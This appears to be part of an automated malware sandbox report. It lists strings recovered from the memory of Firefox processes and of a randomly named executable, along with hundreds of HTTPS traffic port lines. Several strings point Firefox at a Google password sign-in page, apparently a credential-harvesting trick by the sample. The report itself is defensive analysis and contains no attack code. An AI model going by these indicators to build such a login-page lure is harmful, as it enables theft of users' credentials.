Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentA
Source: d015c0e328.exe, 00000007.00000003.2511775357.0000000005B11000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2647615731.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2752859733.00000000054A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000019.00000002.2775417084.0000001E000BC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023823448.00000209AFB77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000019.00000002.2961463851.00000209AA1AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000019.00000002.2959507952.00000209AA05B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2995392168.00000209AA703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000019.00000002.2961463851.00000209AA1AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2804534100.00000209A34D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000017.00000002.2608668003.00000163738C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2616696992.0000023C6A7AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2793733259.00000209979E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdA
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdError
Source: firefox.exe, 00000019.00000002.2876719216.00000209A788A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2799354535.000002099955B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://a581
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account_addSuggestedIndexResults/
Source: firefox.exe, 00000019.00000003.2726569286.00000209AA1C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.comP
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50218
Source: unknown Network traffic detected: HTTP traffic on port 50254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50212
Source: unknown Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50214
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50220
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50222
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50224
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50246
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50208
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
